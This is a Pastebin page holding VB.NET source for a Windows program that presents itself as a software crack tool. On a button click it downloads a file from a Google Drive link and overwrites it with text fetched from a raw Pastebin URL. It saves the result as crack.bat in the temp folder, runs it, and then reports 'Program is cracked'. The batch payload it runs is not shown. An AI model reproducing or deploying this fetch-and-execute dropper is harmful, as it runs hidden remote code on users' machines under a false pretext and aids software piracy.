dipf

ooo

Sep 17th, 2017
73
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.28 KB | None | 0 0
  1. Public Class Form1
  2.  
  3. Private Sub Button2_Click(sender As Object, e As EventArgs) Handles Button2.Click
  4. Application.Exit()
  5.  
  6. End Sub
  7.  
  8. Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
  9. Label2.Show()
  10.  
  11. Dim TempFolder As String = My.Computer.FileSystem.CombinePath(My.Computer.FileSystem.SpecialDirectories.Temp, "crack.bat")
  12.  
  13. My.Computer.Network.DownloadFile("https://drive.google.com/uc?authuser=0&id=0BzE21fo8qlamUi1KS1JsU0RrQ0E&export=download", TempFolder)
  14.  
  15. Dim thefile As String = TempFolder
  16. Dim lines() As String = System.IO.File.ReadAllLines(thefile)
  17.  
  18. lines(0) = ""
  19. lines(1) = ""
  20. lines(2) = ""
  21. lines(3) = ""
  22. lines(4) = ""
  23. lines(5) = ""
  24. lines(6) = ""
  25. lines(7) = ""
  26. lines(8) = ""
  27.  
  28. System.IO.File.WriteAllLines(thefile, lines)
  29.  
  30. Form2.Show()
  31. Form2.Button1.PerformClick()
  32. TextBox1.Text = Form2.TextBox1.Text
  33.  
  34. Dim writefile As New System.IO.StreamWriter(thefile)
  35. writefile.Write(TextBox1.Text)
  36. writefile.Close()
  37.  
  38. If thefile.Contains("crack.bat") Then
  39. Button3_Click(sender, e)
  40. System.Threading.Thread.Sleep(9000)
  41. Label2.Hide()
  42. MsgBox("Program is cracked", MsgBoxStyle.Information, "Action Crack by Danger")
  43.  
  44.  
  45. End If
  46.  
  47. End Sub
  48.  
  49. Private Sub Button3_Click(sender As Object, e As EventArgs) Handles Button3.Click
  50. Dim TempRun As String = My.Computer.FileSystem.CombinePath(My.Computer.FileSystem.SpecialDirectories.Temp, "crack.bat")
  51.  
  52. System.Diagnostics.Process.Start(TempRun)
  53.  
  54. End Sub
  55.  
  56. Private Sub Form1_Load(sender As Object, e As EventArgs) Handles MyBase.Load
  57. Label2.Hide()
  58.  
  59. End Sub
  60. End Class
  61. -----------------------
  62. Imports System.IO
  63. Imports System.Net
  64.  
  65. Public Class Form2
  66.  
  67. Private Sub Button1_Click(sender As Object, e As EventArgs) Handles Button1.Click
  68. Dim address As String = "https://pastebin.com/raw/J5N37942"
  69.  
  70. Dim client As WebClient = New WebClient
  71.  
  72. Dim onlineread As StreamReader = New StreamReader(client.OpenRead(address))
  73.  
  74. TextBox1.Text = onlineread.ReadToEnd
  75.  
  76.  
  77.  
  78. End Sub
  79.  
  80. End Class
Add Comment
Please, Sign In to add comment